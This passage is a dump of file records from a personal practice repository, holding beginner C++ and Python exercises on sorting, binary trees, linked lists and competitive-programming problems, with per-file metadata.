"#include<bits/stdc++.h>\nusing namespace std;\n\nvoid insertionsort(vector< int > &vec)\n{\n\tint i,j, key;\n\tfor(i = 1; i < vec.size(); i++)\n\t{\n\t\tkey = vec[i];\n\t\tj = i - 1;\n\t\twhile(j >= 0 && key < vec[j])\n\t\t{\n\t\t\tvec[j+1] = vec[j];\n\t\t\tj--;\n\t\t}\t\n\t\tvec[j+1] = key;\n\t}\n}\n\n\nvoid printvector(vector< int > vec)\n{\n\tfor(int i = 0 ; i < vec.size(); i++)\n\t{\n\t\tcout << vec[i] << \"\\t\";\n\t}\n}\n\nint main()\n{\n\tint n, i;\n\tcin >> n;\n\tvector< int >vec(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> vec[i];\n\t}\n\tinsertionsort(vec);\n\tprintvector(vec);\n\n}\n\n" }, { "alpha_fraction": 0.5162703394889832, "alphanum_fraction": 0.5231539607048035, "avg_line_length": 13.660550117492676, "blob_id": "54a07cddc88b43c730addefb51aeed7ee5128647", "content_id": "d06c51fdb3d1b594877a773592bb2d55e5f03cd7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1598, "license_type": "permissive", "max_line_length": 77, "num_lines": 109, "path": "/C++/tree/levelOrder.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h> // No.of nodes at particular level using level order.\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\t\tint data;\n\t\tNode* left;\n\t\tNode* right;\n\t\tNode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tleft = NULL;\n\t\t\tright = NULL;\n\t\t}\n};\n\nNode* newNode(int data)\n{\n\tNode* new_node = new Node(data);\n\treturn new_node;\n}\n\n\nint maxwidth(Node* root)\n{\n\tif(root == NULL)\n\t{\n\t\treturn 0;\n\t}\n\tint result = 0;\n\t\n\tqueue<Node*> q;\n\tq.push(root);\n\twhile(!q.empty())\n\t{\n\t\tint count = q.size();\n\t\t\n\t\tresult = max(count, result);\n\t\t\n\t\twhile(count--)\n\t\t{\n\t\t\tNode* temp = q.front();\n\t\t\tq.pop();\n\t\t\t\n\t\t\tif(temp->left != NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->left);\n\t\t\t}\n\t\t\tif(temp->right != NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->right);\n\t\t\t}\n\t\t}\t\n\t}\n\treturn result;\n}\n\n\n//seperate lvl order\nvoid levelorder(Node* root)\n{\n\tif(root == NULL)\n\t{\n\t\tcout << 0;\n\t}\n\t\n\tqueue<Node*>q;\n\tq.push(root);\n\t\n\twhile(!q.empty())\n\t{\n\t\tint count = q.size();\n\t\t\n\t\twhile(count--)\n\t\t{\n\t\t\tNode *temp = q.front();\n\t\t\tq.pop();\n\t\t\tcout << temp->data << \" -> \" ;\n\t\t\t\n\t\t\tif(temp->left!=NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->left);\n\t\t\t}\n\t\t\tif(temp->right != NULL)\n\t\t\t{\n\t\t\t\tq.push(temp->right);\t\n\t\t\t}\t\n\t\t}\n\t}\n\t\n}\n\nint main()\n{\n\tNode* root = newNode(1);\n root->left = newNode(2); \n root->right = newNode(3); \n root->left->left = newNode(4); \n root->left->right = newNode(5); \n root->right->right = newNode(8); \n root->right->right->left = newNode(6); \n root->right->right->right = newNode(7);\n \n cout << \"Level order is \" << \"\\n\";\n levelorder(root);\n cout <<\"\\n\";\n cout << \"Max width = \" << maxwidth(root) << \"\\n\";\n}\n" }, { "alpha_fraction": 0.5414937734603882, "alphanum_fraction": 0.5532503724098206, "avg_line_length": 12.514019012451172, "blob_id": "d58e5ccb8e0bd1cf306b0a26d9b1cf93f101ee9e", "content_id": "45be2e2dceccc56775878ecb42003bb44ff1a876", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1446, "license_type": "permissive", "max_line_length": 37, "num_lines": 107, "path": "/C++/Linkedlist/add & del node in between.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\t\tint data;\n\t\tNode* next;\n\t\tNode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tnext = NULL;\n\t\t}\n};\n\nclass Linkedlist\n{\n\tpublic:\n\tNode* head;\n\tNode* tail;\n\tint len;\n\tLinkedlist()\n\t{\n\t\thead = NULL;\n\t\ttail = NULL;\n\t\tlen = 0;\n\t}\n\t\n\tvoid append(int data)\n\t{\n\t\tNode* new_node = new Node(data);\n\t\tif(len == 0)\n\t\t{\n\t\t\thead = new_node;\n\t\t\ttail = new_node;\n\t\t\tnew_node->next = NULL;\n\t\t\t++len;\n\t\t}\n\t\telse\n\t\t{\n\t\t\ttail->next = new_node;\n\t\t\ttail = new_node;\n\t\t\ttail->next = NULL;\n\t\t\t++len;\n\t\t}\n\t}\n\t\n\t//Adding new node at specific index \n\tvoid addNode(int index, int data)\n\t{\n\t\tNode* new_node = new Node(data);\n\t\tint i = 0;\n\t\tNode* temp = head;\n\t\tNode* templink;\n\t\tfor(i=0;i<index-1;i++)\n\t\t{\n\t\t\ttemp = temp->next;\n\t\t}\n\t\ttemplink = temp->next;\n\t\ttemp->next = new_node;\n\t\tnew_node->next = templink;\n\t}\n\t\n\tvoid deleteNode(int index)\n\t{\n\t\tint i;\n\t\tNode* temp = head;\n\t\tNode* delNode;\n\t\tfor(i=0;i<index-1;i++)\n\t\t{\n\t\t\ttemp = temp->next;\n\t\t}\n\t\tdelNode = temp->next;\n\t\ttemp->next = delNode->next;\n\t\tdelNode->next = NULL;\n\t}\n\t\n\tvoid printlist()\n\t{\n\t\tNode* temp = head;\n\t\twhile(temp != NULL)\n\t\t{\n\t\t\tcout << temp->data << \" -> \";\n\t\t\ttemp = temp->next;\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n};\n\nint main()\n{\n\tLinkedlist* ll = new Linkedlist();\n\tll->append(2);\n\tll->append(3);\n\tll->append(4);\n\tll->append(5);\n\tll->append(6);\n\tll->append(7);\n\t\n\tll->addNode(2, 30);\n\t\n\tll->printlist();\n\t\n\tll->deleteNode(2);\n\t\n\tll->printlist();\n}\n" }, { "alpha_fraction": 0.39726027846336365, "alphanum_fraction": 0.4292237460613251, "avg_line_length": 17.869565963745117, "blob_id": "854a610fca518c55d2ef74d25cedf7098436f4c7", "content_id": "3c0a11420e671adb17737ec96a18ca6f1e414ed9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 438, "license_type": "permissive", "max_line_length": 37, "num_lines": 23, "path": "/C++/May Long/Isolation Centers.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 13:09:56 2020\n\n@author: teja\n\"\"\"\n\nt = int(input())\nwhile(t):\n n, q = map(int, input().split())\n li = list(input())\n se = set(li)\n dic = {}\n for i in se:\n dic[i] = li.count(i)\n for i in range(q):\n c = int(input())\n ans = 0\n for val in dic.values():\n if val > c:\n ans = ans + (val - c)\n print(ans)\n t-=1\n " }, { "alpha_fraction": 0.5938303470611572, "alphanum_fraction": 0.5981148481369019, "avg_line_length": 11.824175834655762, "blob_id": "2ceb5f9e5281c8f72d858c2d7f6f28a84e45f487", "content_id": "289ae5a8a7489b1980cc37c66789c1c9f5553041", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1167, "license_type": "permissive", "max_line_length": 36, "num_lines": 91, "path": "/C++/tree/traversals.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* left;\n\tNode* right;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tleft = NULL;\n\t\tright = NULL;\n\t}\n};\n\nNode* newNode(int data)\n{\n\tNode* new_node = new Node(data);\n\treturn new_node;\n}\n\nvoid inorderTraversal(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn;\n\t}\n\t\n\t//left \n\tinorderTraversal(node->left);\n\t\n\t//data\n\tcout << node->data << \" \";\n\t\n\t//right\n\tinorderTraversal(node->right);\n}\n\nvoid preorderTraversal(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn;\n\t}\n\t\n\t\t//data\n\tcout << node->data << \" \";\n\t\n\t//left \n\tpreorderTraversal(node->left);\n\t\n\t//right\n\tpreorderTraversal(node->right);\n}\n\nvoid postorderTraversal(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn;\n\t}\n\t\n\t//left \n\tpostorderTraversal(node->left);\n\t\n\t\t//right\n\tpostorderTraversal(node->right);\n\t\n\t//data\n\tcout << node->data << \" \";\n\t\n\n}\n\n\nint main()\n{\n\tNode* root = newNode(1);\n\troot->left = newNode(2); \n root->right = newNode(3); \n root->left->left = newNode(4); \n root->left->right = newNode(5); \n inorderTraversal(root);\n cout << \"\\n\";\n postorderTraversal(root);\n cout << \"\\n\";\n preorderTraversal(root);\n\n}\n" }, { "alpha_fraction": 0.45863309502601624, "alphanum_fraction": 0.4892086386680603, "avg_line_length": 16.80645179748535, "blob_id": "0b4645917effe6641ef8c2f94a45410adb8681d9", "content_id": "471fdd0ea2c703a5a692ad4667dced91986085e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 556, "license_type": "permissive", "max_line_length": 35, "num_lines": 31, "path": "/openlab_coding_preperation/Basic_Tree.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 5 11:33:27 2020\n\n@author: krish\n\"\"\"\n\nclass Node:\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n \n\ndef preorder(root):\n if(root):\n \n if(root.left):\n preorder(root.left)\n \n print(root.data)\n \n if root.right:\n preorder(root.right)\n\nif __name__=='__main__':\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n root.left.left = Node(10)\n preorder(root)\n " }, { "alpha_fraction": 0.5729646682739258, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 12.26530647277832, "blob_id": "8194e31a0043b44fcf2a4062f9feac084a4a303e", "content_id": "5ddd0ab9a24a2e03f97f04559a4216057c5725b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 651, "license_type": "permissive", "max_line_length": 36, "num_lines": 49, "path": "/C++/tree/inorder successor.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* left;\n\tNode* right;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tleft = right = NULL;\n\t}\n};\n\nNode* new_node(int data)\n{\n\tNode* newNode = new Node(data);\n\treturn newNode;\n}\n\nvoid inorder(Node* node)\n{\n\tNode* templ = node->left->left;\n\t//Node* tempr = node->left->left;\n\t\n\n\t\n\tif(templ == NULL)\n\t{\n\t\tcout << \"node\";\n\t\treturn;\n\t}\n\tinorder(node->left);\n\t\n\tcout << node->data << \" \";\n\t\n\tinorder(node->right);\n}\n\nint main()\n{\n\tNode* root = new_node(1);\n\troot->left = new_node(8); \n root->right = new_node(12); \n root->left->left = new_node(3); \n inorder(root);\n}\n\n" }, { "alpha_fraction": 0.442812979221344, "alphanum_fraction": 0.4760432839393616, "avg_line_length": 22.454545974731445, "blob_id": "18bbced1d55b9faf273f64735a1fbfc5f2df0e5f", "content_id": "fb91c7f19c4485713a313e2e086f8f2f54c6f9ab", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1294, "license_type": "permissive", "max_line_length": 64, "num_lines": 55, "path": "/python/HPOJ/Owl Fight/Fight.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 6 10:19:45 2020\n\n@author: teja\n\"\"\"\n\ndef parent(use, a):\n if(use[a] < 0):\n return use[a]\n else:\n return parent(use, use[a])\n\n\n\nl = list(map(int,input().split()))\nn = l[0]\nm = l[1]\nuse = []\nuse.append(0)\nfor i in range(1, n+1):\n use.append(-i);\n#print(use)\nfor i in range(1, m+1):\n temp = list(map(int, input().split()))\n if(use[temp[0]] < 0 and use[temp[1]] < 0): \n use[temp[0]] = min(use[temp[0]], use[temp[1]])\n use[temp[1]] = temp[0]\n # print(\"use = \" + str(use))\n elif(use[temp[0]] > 0 and use[temp[1]] < 0):\n use[use[temp[0]]] = min(use[use[temp[0]]], use[temp[1]])\n use[temp[1]] = use[temp[0]]\n # print(\"use = \" + str(use))\n else:\n use[use[temp[1]]] = min(use[temp[0]], use[use[temp[1]]])\n use[temp[0]] = use[temp[1]]\n # print(\"use = \" + str(use))\n#print(use)\n\nq = int(input())\nfights = []\nfor i in range(q):\n a,b = list(map(int, input().split()))\n #print(\"a = \" + str(a))\n # print(\"b = \" + str(b))\n pa = abs(int(parent(use, a)))\n pb = abs(int(parent(use, b)))\n #print(\"pa = \" + str(pa))\n # print(\"pb = \" + str(pb))\n if(pa == pb):\n print(\"TIE\")\n elif (pa < pb):\n print(b)\n else:\n print(a)\n " }, { "alpha_fraction": 0.5731707215309143, "alphanum_fraction": 0.5820398926734924, "avg_line_length": 13.317460060119629, "blob_id": "f14625d456bb23ec662a7cc81c3a2c2a74ec2785", "content_id": "c982a614f0a6505c7bf36c8540e313107818c816", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 902, "license_type": "permissive", "max_line_length": 56, "num_lines": 63, "path": "/C++/tree/basic_func.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h> // Tree size & height\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* left;\n\tNode* right;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tleft = NULL;\n\t\tright = NULL;\n\t}\n};\n\nNode* new_node(int data)\n{\n\tNode* node = new Node(data);\n\treturn node;\n}\n\n// Size of tree - no.of nodes in a tree\nint size(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn 0;\n\t}\n\telse\n\t{\n\t\treturn (size(node->left) + 1 + size(node->right));\n\t}\n}\n\n// max ht of a tree\nint maxdepth(Node* node)\n{\n\tif(node == NULL)\n\t{\n\t\treturn 0;\n\t}\n\telse\n\t{\n\t\tint ldepth = maxdepth(node->left);\n\t\tint rdepth = maxdepth(node->right);\n\t\t\n\t\treturn(max(ldepth, rdepth) + 1);\n\t}\n}\n\nint main()\n{\n\tNode* root = new_node(2);\n\troot->left = new_node(3);\n\troot->right = new_node(4);\n\troot->left->right = new_node(5);\n\t\n\tcout << \"height of tree is \" << maxdepth(root) << \"\\n\";\n\tcout << \"size of tree is \"<< size(root) << \"\\n\";\n\t\n}\n" }, { "alpha_fraction": 0.35322195291519165, "alphanum_fraction": 0.38424819707870483, "avg_line_length": 8.545454978942871, "blob_id": "97b449dde8379b793bf5dbb9a7af148b449b5040", "content_id": "777a5e8a2746cb25056a9042d4b2dd893723b79c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 419, "license_type": "permissive", "max_line_length": 23, "num_lines": 44, "path": "/C++/CIELAB.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tsrand (time(NULL));\n\tint a,b,c,d;\n\tcin >> a >> b;\n\tc = a-b;\n\td = c % 10;\n\tb = c / 10;\n\tif(b==0)\n\t{\n\t\tc = rand() % 5;\n\twhile(1)\n\t{\n\t\tif(c==d || c == 0)\n\t\t{\n\t\tc = rand() % 5;\t\n\t\t}\t\n\t\telse\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\tcout << c;\n\t}\n\telse\n\t{\n\t\tc = rand() % 5;\n\twhile(1)\n\t{\n\t\tif(c==d || c==0)\n\t\t{\n\t\tc = rand() % 5;\t\n\t\t}\t\n\t\telse\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\tcout << b << c;\n\t}\n\t\n}" }, { "alpha_fraction": 0.3958333432674408, "alphanum_fraction": 0.4109848439693451, "avg_line_length": 10.21276569366455, "blob_id": "be3a80f5eeab3a4087ffeb8654e312647791209f", "content_id": "49cefe03750198642c51b0014cca74fb74bf5c2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 528, "license_type": "permissive", "max_line_length": 29, "num_lines": 47, "path": "/C++/Selectionsort.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint n, i, j;\n\tcin >> n;\n\tvector< int >val(n);\n\tint ind = 0, min;\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> val[i];\n\t}\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << val[i] << \"\\t\";\n\t}\n\tcout << \"\\n\";\n\t\n\tfor(i=0;i<n-1;i++)\n\t{\n\t\tmin = val[i+1];\n\t\tind = i+1;\n\t\tfor(j=i;j<n;j++)\n\t\t{\n\t\t\tif(min > val[j])\n\t\t\t{\n\t\t\t\tmin = val[j];\n\t\t\t\tind = j;\n\t\t\t}\n\t\t}\n\t\tint temp = min;\n\t\tval[ind] = val[i];\n\t\tval[i] = temp;\n\t}\n\t\n\tcout << \"came out \" << \"\\n\";\n\t\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << val[i] << \"\\t\";\n\t}\n\t\n\n}\n\n" }, { "alpha_fraction": 0.4244185984134674, "alphanum_fraction": 0.44476744532585144, "avg_line_length": 12.269230842590332, "blob_id": "657784d15baa504f825fa12cddc78e0432a4a159", "content_id": "9bcf8de201d28ae3514a0d8bc70642b9c1b8ed3a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 344, "license_type": "permissive", "max_line_length": 29, "num_lines": 26, "path": "/C++/HORSES.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tint t,n,i;\n\tcin >> t; \n\twhile(t--)\n\t{\n\tcin >> n;\n\tvector< long long > a(n);\n\tfor(i=0; i<n; i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tsort(a.begin(),a.end());\n\tlong long min = a[1] - a[0];\n\tfor(i=1;i<n-1;i++)\n\t{\n\t\tif(min > (a[i+1] - a[i]))\n\t\t{\n\t\t\tmin = a[i+1] - a[i];\n\t\t}\n\t}\n\tcout << min << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 0.47089946269989014, "avg_line_length": 16.677419662475586, "blob_id": "9cdaa8c0ac2f1fbaa5d04108287591be72275d46", "content_id": "b5b844ff8828bcbaadf00fe55a1ac61f5d84cca0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "permissive", "max_line_length": 35, "num_lines": 31, "path": "/openlab_coding_preperation/LL.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:11:19 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LL:\n \n def __init__(self):\n self.head = None\n \n def printLL(self):\n temp = self.head\n while(temp):\n print(temp.data)\n temp = temp.next\n\nif __name__=='__main__':\n llist = LL()\n \n llist.head = Node(1)\n llist.head.next = Node(2)\n llist.head.next.next = Node(3)\n \n llist.printLL()\n \n \n \n " }, { "alpha_fraction": 0.5532646179199219, "alphanum_fraction": 0.5567010045051575, "avg_line_length": 14.315789222717285, "blob_id": "830a86f33ae8d03507b74c0f9acdf16e321de31d", "content_id": "de6e64aa877d29f21e934276af1d51d828212df2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 291, "license_type": "permissive", "max_line_length": 33, "num_lines": 19, "path": "/C++/macros.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "//#include<bits/stdc++.h>\n//#define EXEC m##a##i##n\n//#define g(a) #a\n//#define h(a) EXEC( )\n//using namespace std;\n//int h(a)\n//{\n//cout<<\"Hello \"<<g(world)<<endl;\n//return 0;\n//}\n\n#include<bits/stdc++.h>\nusing namespace std;\n#define h(a) #a\n\nint main()\n{\n\tcout << \"func = \" << h(macro);\n}\n" }, { "alpha_fraction": 0.39677420258522034, "alphanum_fraction": 0.42903226613998413, "avg_line_length": 11.399999618530273, "blob_id": "e0b8cb406a210b9e6172f2106aa543a8be849a50", "content_id": "dba88a17763b41485abbe20b1f6e494866a72ec6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 310, "license_type": "permissive", "max_line_length": 28, "num_lines": 25, "path": "/C++/dec_long_1.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, p, s, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tvector<int> a(10,0);\n\t\tcin >> n;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> p >> s;\n\t\t\ta[p-1] = max(a[p-1], s);\t\n\t\t}\n\t\tint ans = 0;\n\t\tfor(i=0;i<=7;i++)\n\t\t{\n\t\t\tans+=a[i];\n\t\t}\n\t\tcout << ans << \"\\n\";\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.41952505707740784, "alphanum_fraction": 0.4313984215259552, "avg_line_length": 13.576923370361328, "blob_id": "7ad61663cf1de8761ec5888d605f588b0867feff", "content_id": "185c30b679c0eda52c25f83716954e37acf72d81", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 758, "license_type": "permissive", "max_line_length": 40, "num_lines": 52, "path": "/C++/XOR.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint countSetBits(int n) \n{ \n unsigned int count = 0; \n while (n) { \n n &= (n - 1); \n count++; \n } \n return count; \n} \n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n \n int t, n, q, i, p, bits = 0;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tcin >> q;\n\t\tvector< int > val(n);\n\t\tvector< int > xoo(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> val[i];\n\t\t}\n\t\twhile(q--)\n\t\t{\n\t\t\tint ceven = 0, codd = 0;\n\t\t\tcin >> p;\n\t\t\tfor(i=0;i<n;i++)\n\t\t\t{\n\t\t\t\txoo[i] = val[i] ^ p;\n//\t\t\t\tbits = __builtin_popcount(xoo[i]);\n\t\t\t\tbits = countSetBits(xoo[i]);\n\t\t\t\tif(bits % 2 == 0)\n\t\t\t\t{\n\t\t\t\t\tceven++;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcodd++;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcout << ceven << \" \" << codd << \"\\n\";\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.421875, "alphanum_fraction": 0.43914473056793213, "avg_line_length": 19.827587127685547, "blob_id": "ef132ba0cbcd428d6d91533950f0e06ff73da99a", "content_id": "35ce801f8349b6559a6ca889c0b25056917bd071", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "permissive", "max_line_length": 42, "num_lines": 58, "path": "/openlab_coding_preperation/remove_nth-node_fromEnd.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:35:38 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n \n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LL:\n def __init__(self, data):\n node = Node(data)\n self.head = node\n \n def attachLink(self,data):\n temp = self.head\n while(temp.next!=None):\n temp = temp.next\n node = Node(data)\n temp.next = node\n \n def printLL(self):\n temp = self.head\n while(temp):\n print(temp.data,end=\" -> \")\n temp = temp.next\n \n def remove(self, n, l):\n if n > len(l):\n n = n % len(l)\n \n if n == len(l):\n self.head = self.head.next\n else:\n temp = self.head\n for i in range(0, len(l)-n-1):\n temp = temp.next\n temp.next = temp.next.next\n \n \nif __name__ == '__main__':\n l = [1,2,3,4,5]\n \n llist = LL(l[0])\n for i in range(1, len(l)):\n llist.attachLink(l[i])\n \n llist.printLL()\n \n \n # remove nth Node from end\n n = int(input())\n llist.remove(n,l)\n llist.printLL()\n " }, { "alpha_fraction": 0.5441176295280457, "alphanum_fraction": 0.5735294222831726, "avg_line_length": 15.975000381469727, "blob_id": "1c3dc26645b8943769aa0e6e81fd91ce2dbaeec6", "content_id": "68e22310e3d504e15e26b1e2ff8049dc271df34a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 680, "license_type": "permissive", "max_line_length": 91, "num_lines": 40, "path": "/C++/tree/priority_queue.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<queue>\nusing namespace std;\n\nint main()\n{\n\tcout << \"Priority queue\" << \"\\n\";\n\tpriority_queue< int > pqueue; // Default Max heap, To get MIN vals - store the values by \n\t\t\t\t\t\t\t\t\t// multiplying -1 and push to queue\n\tpqueue.push(5);\n\tpqueue.push(1);\n\tpqueue.push(7);\n\tpqueue.push(2);\n\tpqueue.push(10);\n\t\n\twhile(!pqueue.empty())\n\t{\n\t\tint val = pqueue.top();\n\t\tcout << val << \"\\t\";\n\t\tpqueue.pop();\n\t}\n\t\n\tcout << \"\\n\";\n\t\n\tpriority_queue< int > minq;\n\tminq.push(-5); // Pushing 5, 1, 7, 2, 10\n\tminq.push(-1);\n\tminq.push(-7);\n\tminq.push(-2);\n\tminq.push(-10);\n\t\n\twhile(!minq.empty())\n\t{\n\t\tint val = minq.top();\n\t\tcout << -1*val << \"\\t\";\n\t\tminq.pop();\n\t}\n\t\n\n}\n\n" }, { "alpha_fraction": 0.6984127163887024, "alphanum_fraction": 0.6984127163887024, "avg_line_length": 16.85714340209961, "blob_id": "ad2189f13c73b85585388e7f507fb3d71885793a", "content_id": "67f21f94d062f665003facef1a8511efb941265c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "permissive", "max_line_length": 82, "num_lines": 7, "path": "/README.md", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# Programming \n\nCode of most of the questions that I practiced in codechef, codeforces & leetcode\n\n## Authors\n\n* **T P V Krishna Teja**\n\n" }, { "alpha_fraction": 0.4121405780315399, "alphanum_fraction": 0.4760383367538452, "avg_line_length": 15.526315689086914, "blob_id": "765733b1443d4d8b1159f910666a4bec885f879a", "content_id": "69309e791f3504045037ecbb5a5f981f820517bb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "permissive", "max_line_length": 54, "num_lines": 19, "path": "/python/NumCharSpl.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 7 10:17:36 2020\n\n@author: teja\n\"\"\"\n\ns = '12asdbkFWS(#@!qde'\ncn = 0\nca = 0\ncspl = 0\nfor i in range(len(s)):\n if s[i].isalpha():\n ca+=1\n elif s[i].isnumeric():\n cn+=1\n else:\n cspl+=1\nprint(str(cn) + \" \" + str(ca) + \" \" + str(cspl) + \" \")" }, { "alpha_fraction": 0.41085270047187805, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 12, "blob_id": "908478bf9632151cf80d2c20fe8a6e5915b11613", "content_id": "b72c868fdd58432a2009a670591b033bdcbe64cd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "permissive", "max_line_length": 35, "num_lines": 10, "path": "/python/index_prac.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 7 10:15:57 2020\n\n@author: teja\n\"\"\"\n\nn = 10\nfor i in range(n, 5, -2):\n print(i)" }, { "alpha_fraction": 0.39376771450042725, "alphanum_fraction": 0.41265344619750977, "avg_line_length": 19, "blob_id": "3b293981311eaf74f4da8ed590bf69d5ec7dbefd", "content_id": "5de652ac4c0524a197ac5f0e682d94bd07e5d72b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1059, "license_type": "permissive", "max_line_length": 35, "num_lines": 53, "path": "/openlab_coding_preperation/BST_Construction.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 5 11:52:19 2020\n\n@author: krish\n\"\"\"\n\nclass Node:\n def __init__(self,data):\n self.data = data\n self.left = None\n self.right = None\n \n\ndef addNode(root, data):\n node = Node(data)\n temp = root\n while(temp):\n if(data < temp.data):\n if temp.left == None:\n temp.left = node\n break\n else:\n temp = temp.left\n \n elif(data > 